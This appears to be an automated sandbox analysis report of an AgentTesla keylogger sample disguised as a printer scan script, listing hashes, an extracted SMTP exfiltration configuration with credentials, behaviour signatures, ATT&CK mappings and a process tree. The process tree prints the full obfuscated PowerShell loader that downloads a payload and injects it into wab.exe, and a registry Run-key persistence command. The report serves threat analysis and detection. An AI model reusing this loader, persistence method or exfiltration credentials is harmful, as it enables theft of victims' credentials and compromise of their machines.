agenttesla | e2d0c08b7f98847ee902bab3294fafb38d18f2177e60272a3c98b21fab88f6e0

General

Target

Printerhp_Scan.vbs
Size

167KB
MD5

093485c48a06d1ddf87786d6c0320aa3
SHA1

f398e91c651e949311931a3ce32a8670b9af811a
SHA256

e2d0c08b7f98847ee902bab3294fafb38d18f2177e60272a3c98b21fab88f6e0
SHA512

1972da6d7175b1cd77d4707da311965d63f57589805f74cc3f8cd318fbc1d0a77de740d6e64833ff9bd8c1e6550e78b69d6623e0d8000a0d419a39312b69f23f
SSDEEP

3072:upK6/PeadLaz+kxSzn9Lj7rZeqGbHfNcckB+HGuG5Elx7d5czQON8DGjR35bRK3:upKyPeadLaz+k0zn1j7rZeqGbHfNcckq

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.myhydropowered.com
Port:
587
Username:
[email protected]
Password:
0nVaQweHLu8RyVL
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

3 1760 WScript.exe

flow	pid	process
3	1760	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exewab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Windows\CurrentVersion\Run\uneaten = "%yokeable% -w 1 $Indviklinger=(Get-ItemProperty -Path 'HKCU:\\Belord\\').Snkningsomraadet;%yokeable% ($Indviklinger)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Windows\CurrentVersion\Run\FTSKIaM = "C:\\Users\\Admin\\AppData\\Roaming\\FTSKIaM\\FTSKIaM.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
7 drive.google.com
13 drive.google.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

20 api.ipify.org
21 ip-api.com
19 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1552 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1908 powershell.exe
1552 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1908 set thread context of 1552 1908 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2060 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2940 powershell.exe
1908 powershell.exe
1552 wab.exe
1552 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1908 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2940 powershell.exe
Token: SeDebugPrivilege 1908 powershell.exe
Token: SeDebugPrivilege 1552 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

1552 wab.exe

flow	ioc
6	drive.google.com
7	drive.google.com
13	drive.google.com

flow	ioc
20	api.ipify.org
21	ip-api.com
19	api.ipify.org

pid	process
1552	wab.exe

pid	process
1908	powershell.exe
1552	wab.exe

description	pid	process	target process
PID 1908 set thread context of 1552	1908	powershell.exe	wab.exe

pid	process
2060	reg.exe

pid	process
2940	powershell.exe
1908	powershell.exe
1552	wab.exe
1552	wab.exe

pid	process
1908	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1552	wab.exe

pid	process
1552	wab.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 1760 wrote to memory of 2940	1760	WScript.exe	powershell.exe
PID 1760 wrote to memory of 2940	1760	WScript.exe	powershell.exe
PID 1760 wrote to memory of 2940	1760	WScript.exe	powershell.exe
PID 2940 wrote to memory of 1908	2940	powershell.exe	powershell.exe
PID 2940 wrote to memory of 1908	2940	powershell.exe	powershell.exe
PID 2940 wrote to memory of 1908	2940	powershell.exe	powershell.exe
PID 2940 wrote to memory of 1908	2940	powershell.exe	powershell.exe
PID 1908 wrote to memory of 1552	1908	powershell.exe	wab.exe
PID 1908 wrote to memory of 1552	1908	powershell.exe	wab.exe
PID 1908 wrote to memory of 1552	1908	powershell.exe	wab.exe
PID 1908 wrote to memory of 1552	1908	powershell.exe	wab.exe
PID 1908 wrote to memory of 1552	1908	powershell.exe	wab.exe
PID 1908 wrote to memory of 1552	1908	powershell.exe	wab.exe
PID 1552 wrote to memory of 2824	1552	wab.exe	cmd.exe
PID 1552 wrote to memory of 2824	1552	wab.exe	cmd.exe
PID 1552 wrote to memory of 2824	1552	wab.exe	cmd.exe
PID 1552 wrote to memory of 2824	1552	wab.exe	cmd.exe
PID 2824 wrote to memory of 2060	2824	cmd.exe	reg.exe
PID 2824 wrote to memory of 2060	2824	cmd.exe	reg.exe
PID 2824 wrote to memory of 2060	2824	cmd.exe	reg.exe
PID 2824 wrote to memory of 2060	2824	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Printerhp_Scan.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Karakteristiskes;++$Karakteristiskes;$Karakteristiskes=$Karakteristiskes-1;Function Tharms ($Coprecipitating){$Specialarbejderne=5;$Specialarbejderne++;For($Impaction160=5; $Impaction160 -lt $Coprecipitating.Length-1; $Impaction160+=$Specialarbejderne){$Klbehjernens = 'substring';$Domspraksissen=$Coprecipitating.$Klbehjernens.Invoke($Impaction160, 1);$Fineless=$Fineless+$Domspraksissen}$Fineless;}$Ekskvisitte22=Tharms 'SubdohEnti tR,inctJumenp rogrsThi l:P.ras/Sk,rz/havfrdSpdbrrbalani DashvUnmodeSylle.R.mang ttaioGardeoSkjolgAnimul Ov re Ma k. Dr rcDark.oMistymSme t/SkeleuPaalgc Dds ?Pre.ceConnexKommupSubcao,eighr,enopt over=QuatrdSkrato PemmwElitenSkilslOmtalounforaFost dTrame&rigidiCr stdNidul=Pa.bu1Inno.xAnfo GHenrif GanamMortesBaric6.ablelGlai,FDiscuaPr.te5 He,o- UnmoIGali BEspyetHavneAKlodrDBurges,onfaL DiffdZygav-CockegU inceund.raHe.ocaPillolNight-Ufr,dNUrgamsLussicD,ageH FiloTChymizFisk. ';$Fejrede=$Ekskvisitte22.split([char]62);$Ekskvisitte22=$Fejrede[0];$Somniculous=Tharms 'LuxmeiSporreAuspixDonts ';$Noncompositeness232 = Tharms 'Hor e\Bog.tsLaveny.ughas,orlsw Supeov erkwRecom6 Spla4Becra\CardiWoptniiKammanEns.idLa,inoOvernwCr,ptsalarmPdi,spoD smewAstomeD mefrDesi Sd.sechFyldse Gh nlSussalsuges\Bala,vunsat1Gkke .Orden0Digra\ ChoapBa,sioFantaw SpaneknopsrRevissW.ighh.ubdue,irdllRansal Yupp.Kr mie E anxRawhie Nona ';&($Somniculous) (Tharms 't rim$HonniTSlurkiWealdbRequ.iFor,tcBourte OutjnProgn=Frank$DiffeeKlammnDomstvBronc:D.lecwomstbiForlyn,ersedDi phiSubdorviven ') ;&($Somniculous) (Tharms 'Herac$PertiNBraino ToognGnetucSensoocryptm SkampBr,stoRo ens Sh miH gestBravoeSkeden.fskreTufstsPrechs Klar2 Ch.t3Bimac2G ape=Apart$ ,ireTUddaniUnderb,edociProtocNonpreSporanVoi.e+Oyste$MetafN.ffenoSue,snMetatc dentoAfgremMissipPerlooS lrisInteriRo letRounde Par nMetapeKnojesProalsCnidi2Forsi3Uncal2Ne,st ') ;&($Somniculous) (Tharms ' Elec$BreatERetepkFr.ncsLiv dpCognioUnch.r Sagotscra.aOppebkTeraptfarveiBatikv CofoiNourit.eteoeHype.tAzoxysGlane Fis e= He,d Br d(A,ett(HemoggFun,rwSydlimBespri S,at elthwClubfibortsnSagsg3 Styr2Mortm_OverwpRygskrBlackoIn emcA fliePrem,sVolu.s.enue Evapo-AirviFS.iff AntimPM.dlerEksekoUdforcponere HambsSkib s GemiIRegiod Medl=Tevan$Famil{Unf,bPOmstiIClitsD ,ons}Uns.n)V.kan. .yroCFormeoStal,mSkr lmBoulaaProtonMaskidGan lLLinoliJuncan Li he,ammo)P.eud Villa-Garg.sSad epdo.abl VelaiAl,ust Opar Arill[Ko iacYrkerhHyp raSandbrMuck,]Yinst3,amel4.rmas ');&($Somniculous) (Tharms ' A.ti$BrugtDAt,riuValvem RetofGradao Eneauparadn CividT,ldeeSpr.ad snea .uaca=.ardi .ver$Pri,aEextrakProdusmunkepRasteoCestirBazoot Li na Sig,kMyc ttNonini slrevPrisiiForett TuyeePs.chtVixensCorti[Mo,oa$RugegE Bradk Get,s PurppReim,o ,ilrr Ap,etNoncoaH.ikukIn umt,rilliSno.ev latyiP.piftGingleLedsatGenbrsFlle..UdskicUnvisoLovreuUrtehn MelatKnopu-Fjert2Cus.r]Rentr ');&($Somniculous) (Tharms 'Genbr$ eracr RabahKadise uperoShoddsBrus t SixpaPresstProthiSlaskc Kara= .rud(S bliTaf,ife In rsPersotSpil,-ang,lP undaRheintGrahahTakta Deco$SchchNGoo,eoDia.enMiocecForhaoSpurimBiblipAd pto RicksGuslaiNonprtBk.eneUn.ernSelvseForfdsNordlsKrs,l2Forng3Nonam2Coron)V nha Klnen-mel,eAUnsatnWi dbdKonve Tasi,( nonp[PentaI mpronDiphetAdjudPFremvtDeluxrSideo]Blokm: Non.:SkandsSpaadi BreczSlvere b,tn Slate-.ingbe ontrqBrach Soege8Punc )Assim ') ;if ($rheostatic) {.$Noncompositeness232 $Dumfounded;} else {;$Pommard=Tharms 'klersSRantotVokalaReg lrSlyn.t Unpr-UdvikBBevatiKnaphtGradusKom,aTVoks.r Not aAfprvn FilesBalanfUds reAnilorNeb i Non,- R,crSlnu.joprog.uLdreprSmgtecProtheCa.am Unta$DekorEUanbrkBloussGaeltkSubpevEskadiKphe.standripbelatForestRan fe Vind2 Lyds2Bohem Semi-StormDForkleGold sDecantGym hiF.rven Ab.aa MelatGald,iIndtaoErklrnHarpu Bej s$CurviTGodtgiRewinb Sp,dias.rsc,orsie ScennCampa ';&($Somniculous) (Tharms 'Recar$Ste.dTUdnaeiAffalbSprini.heircSkemaepleapnPujar=Brnes$LangaeAlfadnDatidvB.yer:SkghaaJugulpEta.epKsebldOvervaCzechts.huna Loll ') ;&($Somniculous) (Tharms 'HalvdI.eenlmCursop AggroKastrrOsirit Eti.-Cond.MR.cipoOftnedsvin,uChlorl sprjeTe ra VesteBSmashiMizestAutovsPharyTHard rraadea C.ssn,nsodsMise f A,akeFewtrrKle.t ') ;$Tibicen=$Tibicen+'\Antiblackism.Eft';while (-not $Pureen) {&($Somniculous) (Tharms ' lept$TipolPSolb u Pil,rFrst e oppreRackanBrug.= nejs( KonsTBumpheSteptsPhyllt Stan-Unc,nPRugbraNyhedtS.oddhCoe.b Quinq$ArterT StubiOctocb.ateriSnaglcCrevieFunicnFabia)Sko.l ') ;&($Somniculous) $Pommard;&($Somniculous) (Tharms 'Oil aSfungotBa teaEndegr Fortt O,er- T.erS DagplIntone InsieRea.mp Sola Attac5 Unde ');$Ekskvisitte22=$Fejrede[$Trinnets++%$Fejrede.count];}&($Somniculous) (Tharms 'Gluti$sldniASt.obaDominr OvereSuggem M,veaAshana,ekstl AcinsSu,erkcrap oQua,rnSupertTanterSku.sa ,epokSynostReakteEvakunA stds Udbr Unreg=Akkom SamleGTnknie.rbejtSup.o-PrechC DemaoAlbernadinet Sek e ,ypnn RigstSnyd. Serie$ EsteTU.assiFlertbC,mliineu.icpersueFadabn Filt ');&($Somniculous) (Tharms 'v,lca$OpmunN PhonaIntervBandllOrbiceAnoxibUdkoneArtissModulkReimpu Jeune,rincr TeamnDul leSopitsL.ngr unwa= Cykl Darks[ ti.eS Bre,yMastis RagatFluideM stimLucul.Dar.sCO,avaoFarr,nCancevunorte .erir Rejst,psig]Plexi:Korea:KommaF Fla,rVenneo PivomCatheBBlodraO,eres op.keefter6Si.si4HalacS ConitEumitr,ardiiDemi.nLinieg H li(Bat.l$JaegaA Unmua slunrWorkmeBetjemBjergaExte.aZoomalCrimps.cclikNoncooPettanFrekvt.atitr Skanabutyrk nsubtBanneeHalven RnnesStreg)unhid ');&($Somniculous) (Tharms 'sted $TenuifFord oTekstrOpholbRouxmrI,preuDissig Ce.teSquearSkabeiReflenSkolifNit ooBestrr enedm Eft,a CamotTut,riB rrooDegernKernisAntiesSotweyWeightHypn,eSpagfmBorzo Prin=Meta. Isid,[MalikSK etiyInne.sKrligtMicroeExcubmVkste.Au.ofTTarifeH,sekxS.yggtCass .deltoESquilnansttc,omedoGme,id E leiProgrnC,elogBesty]Va,rg:Snabe:Obla.ATrobaSBevisCToa tIStasiIUdskr.HyperGMunnoe P rst enneSScrattAnnotrBaadeiCa din ,oseg Inco(C rti$Tk,erNMudstaprolevSkattl FremeSkedebAzonieUdenlsVirgikPodosuIntereNaftarFr,tinsemineRedelsco,pr)Fored ');&($Somniculous) (Tharms ' .olt$R.ughUTrittnExiese CeramQuinii stattmodsttPreace ImbedDeesk=Parov$OutrofNedk,oFlankrforudb Lok rUnthouSolfag.soloeFoxwor Ov ri .sosn perifAflveoBac erLandimPlatyaNdpl.t TraiiRowanoNowl,nUdstes PalmsMedaly BluetEtamieDyvelmForha. lovfs,mbiluRedisbTegnts .artt FllerDiskeiDryopnOsteogTrans(Alrun3Kul k0Penne4Chlor4,hett9,orce1trnre, Frem2 Coun6Al in0Nonun4Frik 1Super)Tangg ');&($Somniculous) $Unemitted;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Karakteristiskes;++$Karakteristiskes;$Karakteristiskes=$Karakteristiskes-1;Function Tharms ($Coprecipitating){$Specialarbejderne=5;$Specialarbejderne++;For($Impaction160=5; $Impaction160 -lt $Coprecipitating.Length-1; $Impaction160+=$Specialarbejderne){$Klbehjernens = 'substring';$Domspraksissen=$Coprecipitating.$Klbehjernens.Invoke($Impaction160, 1);$Fineless=$Fineless+$Domspraksissen}$Fineless;}$Ekskvisitte22=Tharms 'SubdohEnti tR,inctJumenp rogrsThi l:P.ras/Sk,rz/havfrdSpdbrrbalani DashvUnmodeSylle.R.mang ttaioGardeoSkjolgAnimul Ov re Ma k. Dr rcDark.oMistymSme t/SkeleuPaalgc Dds ?Pre.ceConnexKommupSubcao,eighr,enopt over=QuatrdSkrato PemmwElitenSkilslOmtalounforaFost dTrame&rigidiCr stdNidul=Pa.bu1Inno.xAnfo GHenrif GanamMortesBaric6.ablelGlai,FDiscuaPr.te5 He,o- UnmoIGali BEspyetHavneAKlodrDBurges,onfaL DiffdZygav-CockegU inceund.raHe.ocaPillolNight-Ufr,dNUrgamsLussicD,ageH FiloTChymizFisk. ';$Fejrede=$Ekskvisitte22.split([char]62);$Ekskvisitte22=$Fejrede[0];$Somniculous=Tharms 'LuxmeiSporreAuspixDonts ';$Noncompositeness232 = Tharms 'Hor e\Bog.tsLaveny.ughas,orlsw Supeov erkwRecom6 Spla4Becra\CardiWoptniiKammanEns.idLa,inoOvernwCr,ptsalarmPdi,spoD smewAstomeD mefrDesi Sd.sechFyldse Gh nlSussalsuges\Bala,vunsat1Gkke .Orden0Digra\ ChoapBa,sioFantaw SpaneknopsrRevissW.ighh.ubdue,irdllRansal Yupp.Kr mie E anxRawhie Nona ';&($Somniculous) (Tharms 't rim$HonniTSlurkiWealdbRequ.iFor,tcBourte OutjnProgn=Frank$DiffeeKlammnDomstvBronc:D.lecwomstbiForlyn,ersedDi phiSubdorviven ') ;&($Somniculous) (Tharms 'Herac$PertiNBraino ToognGnetucSensoocryptm SkampBr,stoRo ens Sh miH gestBravoeSkeden.fskreTufstsPrechs Klar2 Ch.t3Bimac2G ape=Apart$ ,ireTUddaniUnderb,edociProtocNonpreSporanVoi.e+Oyste$MetafN.ffenoSue,snMetatc dentoAfgremMissipPerlooS lrisInteriRo letRounde Par nMetapeKnojesProalsCnidi2Forsi3Uncal2Ne,st ') ;&($Somniculous) (Tharms ' Elec$BreatERetepkFr.ncsLiv dpCognioUnch.r Sagotscra.aOppebkTeraptfarveiBatikv CofoiNourit.eteoeHype.tAzoxysGlane Fis e= He,d Br d(A,ett(HemoggFun,rwSydlimBespri S,at elthwClubfibortsnSagsg3 Styr2Mortm_OverwpRygskrBlackoIn emcA fliePrem,sVolu.s.enue Evapo-AirviFS.iff AntimPM.dlerEksekoUdforcponere HambsSkib s GemiIRegiod Medl=Tevan$Famil{Unf,bPOmstiIClitsD ,ons}Uns.n)V.kan. .yroCFormeoStal,mSkr lmBoulaaProtonMaskidGan lLLinoliJuncan Li he,ammo)P.eud Villa-Garg.sSad epdo.abl VelaiAl,ust Opar Arill[Ko iacYrkerhHyp raSandbrMuck,]Yinst3,amel4.rmas ');&($Somniculous) (Tharms ' A.ti$BrugtDAt,riuValvem RetofGradao Eneauparadn CividT,ldeeSpr.ad snea .uaca=.ardi .ver$Pri,aEextrakProdusmunkepRasteoCestirBazoot Li na Sig,kMyc ttNonini slrevPrisiiForett TuyeePs.chtVixensCorti[Mo,oa$RugegE Bradk Get,s PurppReim,o ,ilrr Ap,etNoncoaH.ikukIn umt,rilliSno.ev latyiP.piftGingleLedsatGenbrsFlle..UdskicUnvisoLovreuUrtehn MelatKnopu-Fjert2Cus.r]Rentr ');&($Somniculous) (Tharms 'Genbr$ eracr RabahKadise uperoShoddsBrus t SixpaPresstProthiSlaskc Kara= .rud(S bliTaf,ife In rsPersotSpil,-ang,lP undaRheintGrahahTakta Deco$SchchNGoo,eoDia.enMiocecForhaoSpurimBiblipAd pto RicksGuslaiNonprtBk.eneUn.ernSelvseForfdsNordlsKrs,l2Forng3Nonam2Coron)V nha Klnen-mel,eAUnsatnWi dbdKonve Tasi,( nonp[PentaI mpronDiphetAdjudPFremvtDeluxrSideo]Blokm: Non.:SkandsSpaadi BreczSlvere b,tn Slate-.ingbe ontrqBrach Soege8Punc )Assim ') ;if ($rheostatic) {.$Noncompositeness232 $Dumfounded;} else {;$Pommard=Tharms 'klersSRantotVokalaReg lrSlyn.t Unpr-UdvikBBevatiKnaphtGradusKom,aTVoks.r Not aAfprvn FilesBalanfUds reAnilorNeb i Non,- R,crSlnu.joprog.uLdreprSmgtecProtheCa.am Unta$DekorEUanbrkBloussGaeltkSubpevEskadiKphe.standripbelatForestRan fe Vind2 Lyds2Bohem Semi-StormDForkleGold sDecantGym hiF.rven Ab.aa MelatGald,iIndtaoErklrnHarpu Bej s$CurviTGodtgiRewinb Sp,dias.rsc,orsie ScennCampa ';&($Somniculous) (Tharms 'Recar$Ste.dTUdnaeiAffalbSprini.heircSkemaepleapnPujar=Brnes$LangaeAlfadnDatidvB.yer:SkghaaJugulpEta.epKsebldOvervaCzechts.huna Loll ') ;&($Somniculous) (Tharms 'HalvdI.eenlmCursop AggroKastrrOsirit Eti.-Cond.MR.cipoOftnedsvin,uChlorl sprjeTe ra VesteBSmashiMizestAutovsPharyTHard rraadea C.ssn,nsodsMise f A,akeFewtrrKle.t ') ;$Tibicen=$Tibicen+'\Antiblackism.Eft';while (-not $Pureen) {&($Somniculous) (Tharms ' lept$TipolPSolb u Pil,rFrst e oppreRackanBrug.= nejs( KonsTBumpheSteptsPhyllt Stan-Unc,nPRugbraNyhedtS.oddhCoe.b Quinq$ArterT StubiOctocb.ateriSnaglcCrevieFunicnFabia)Sko.l ') ;&($Somniculous) $Pommard;&($Somniculous) (Tharms 'Oil aSfungotBa teaEndegr Fortt O,er- T.erS DagplIntone InsieRea.mp Sola Attac5 Unde ');$Ekskvisitte22=$Fejrede[$Trinnets++%$Fejrede.count];}&($Somniculous) (Tharms 'Gluti$sldniASt.obaDominr OvereSuggem M,veaAshana,ekstl AcinsSu,erkcrap oQua,rnSupertTanterSku.sa ,epokSynostReakteEvakunA stds Udbr Unreg=Akkom SamleGTnknie.rbejtSup.o-PrechC DemaoAlbernadinet Sek e ,ypnn RigstSnyd. Serie$ EsteTU.assiFlertbC,mliineu.icpersueFadabn Filt ');&($Somniculous) (Tharms 'v,lca$OpmunN PhonaIntervBandllOrbiceAnoxibUdkoneArtissModulkReimpu Jeune,rincr TeamnDul leSopitsL.ngr unwa= Cykl Darks[ ti.eS Bre,yMastis RagatFluideM stimLucul.Dar.sCO,avaoFarr,nCancevunorte .erir Rejst,psig]Plexi:Korea:KommaF Fla,rVenneo PivomCatheBBlodraO,eres op.keefter6Si.si4HalacS ConitEumitr,ardiiDemi.nLinieg H li(Bat.l$JaegaA Unmua slunrWorkmeBetjemBjergaExte.aZoomalCrimps.cclikNoncooPettanFrekvt.atitr Skanabutyrk nsubtBanneeHalven RnnesStreg)unhid ');&($Somniculous) (Tharms 'sted $TenuifFord oTekstrOpholbRouxmrI,preuDissig Ce.teSquearSkabeiReflenSkolifNit ooBestrr enedm Eft,a CamotTut,riB rrooDegernKernisAntiesSotweyWeightHypn,eSpagfmBorzo Prin=Meta. Isid,[MalikSK etiyInne.sKrligtMicroeExcubmVkste.Au.ofTTarifeH,sekxS.yggtCass .deltoESquilnansttc,omedoGme,id E leiProgrnC,elogBesty]Va,rg:Snabe:Obla.ATrobaSBevisCToa tIStasiIUdskr.HyperGMunnoe P rst enneSScrattAnnotrBaadeiCa din ,oseg Inco(C rti$Tk,erNMudstaprolevSkattl FremeSkedebAzonieUdenlsVirgikPodosuIntereNaftarFr,tinsemineRedelsco,pr)Fored ');&($Somniculous) (Tharms ' .olt$R.ughUTrittnExiese CeramQuinii stattmodsttPreace ImbedDeesk=Parov$OutrofNedk,oFlankrforudb Lok rUnthouSolfag.soloeFoxwor Ov ri .sosn perifAflveoBac erLandimPlatyaNdpl.t TraiiRowanoNowl,nUdstes PalmsMedaly BluetEtamieDyvelmForha. lovfs,mbiluRedisbTegnts .artt FllerDiskeiDryopnOsteogTrans(Alrun3Kul k0Penne4Chlor4,hett9,orce1trnre, Frem2 Coun6Al in0Nonun4Frik 1Super)Tangg ');&($Somniculous) $Unemitted;}"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1908

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "uneaten" /t REG_EXPAND_SZ /d "%yokeable% -w 1 $Indviklinger=(Get-ItemProperty -Path 'HKCU:\Belord\').Snkningsomraadet;%yokeable% ($Indviklinger)"
5⤵
- Suspicious use of WriteProcessMemory
PID:2824

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "uneaten" /t REG_EXPAND_SZ /d "%yokeable% -w 1 $Indviklinger=(Get-ItemProperty -Path 'HKCU:\Belord\').Snkningsomraadet;%yokeable% ($Indviklinger)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2060

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a0ebcad3eada6e0f512c9b3d51870783

SHA1
c38a173d13c74555d3c513e0f6f29ff3e97b5efc

SHA256
5dfaa4627d06bc20780ec4f0d16ef94cdf030f154f2b7736e34a05efb36f55b7

SHA512
2f098437e241ebb92b0b9df14418cd966f05af08b6b4254fed402aefed330a58ea1ac7ce30ee37fdac656156461c9064f9b2108c971e22aff698e46b864bdcde

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
abe9230b0db519d34a635d5acb360911

SHA1
5ecf93588ca88bf1174add7e9c9a391c67b94d91

SHA256
c55d321c18e0e6e9004e80f2ff82d7bd046354afca70fb3bd327007732bc5ca4

SHA512
08085cce87ebee26f52d163102b315b501d805666f8616000ca3ee50873121b51347d566ab7d7eaaaf408d85f6d5866188b297ada0afd9fc9ad0bb7d02d64152

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA3BE.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7D4C.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LFSP43S8ZM178FBLPV5L.temp
Filesize
7KB

MD5
b967dfd3c8eaf7fa35ae206cc957cbbf

SHA1
ec73a47514f6d4f55b5a5940d4a320af3f545d86

SHA256
2e452305c3c15e1fe04787d1a6d097cafce656f8ca490d68332797b08377d905

SHA512
0ecf87404484e62b67798635a8a59ee58d79039157228f667eb49c3581673f8b84ef98f52bba6945f6406fe5adf7447ea88478e64f2f7331b28c795471482a14

Download Submit
memory/1552-93-0x00000000737F0000-0x0000000073EDE000-memory.dmp

Filesize
6.9MB

Download
memory/1552-89-0x0000000077C80000-0x0000000077D56000-memory.dmp

Filesize
856KB

Download
memory/1552-92-0x0000000000920000-0x0000000000962000-memory.dmp

Filesize
264KB

Download
memory/1552-87-0x0000000000920000-0x0000000001982000-memory.dmp

Filesize
16.4MB

Download
memory/1552-59-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/1552-94-0x0000000024940000-0x0000000024980000-memory.dmp

Filesize
256KB

Download
memory/1552-62-0x0000000000920000-0x0000000001982000-memory.dmp

Filesize
16.4MB

Download
memory/1552-99-0x00000000737F0000-0x0000000073EDE000-memory.dmp

Filesize
6.9MB

Download
memory/1552-101-0x0000000024940000-0x0000000024980000-memory.dmp

Filesize
256KB

Download
memory/1552-60-0x0000000077CB6000-0x0000000077CB7000-memory.dmp

Filesize
4KB

Download
memory/1552-61-0x0000000077C80000-0x0000000077D56000-memory.dmp

Filesize
856KB

Download
memory/1908-32-0x0000000073930000-0x0000000073EDB000-memory.dmp

Filesize
5.7MB

Download
memory/1908-33-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/1908-90-0x0000000073930000-0x0000000073EDB000-memory.dmp

Filesize
5.7MB

Download
memory/1908-50-0x0000000073930000-0x0000000073EDB000-memory.dmp

Filesize
5.7MB

Download
memory/1908-51-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/1908-52-0x0000000073930000-0x0000000073EDB000-memory.dmp

Filesize
5.7MB

Download
memory/1908-55-0x0000000005140000-0x0000000005141000-memory.dmp

Filesize
4KB

Download
memory/1908-56-0x0000000006400000-0x000000000B0DE000-memory.dmp

Filesize
76.9MB

Download
memory/1908-57-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/1908-58-0x0000000077C80000-0x0000000077D56000-memory.dmp

Filesize
856KB

Download
memory/1908-88-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/1908-30-0x0000000073930000-0x0000000073EDB000-memory.dmp

Filesize
5.7MB

Download
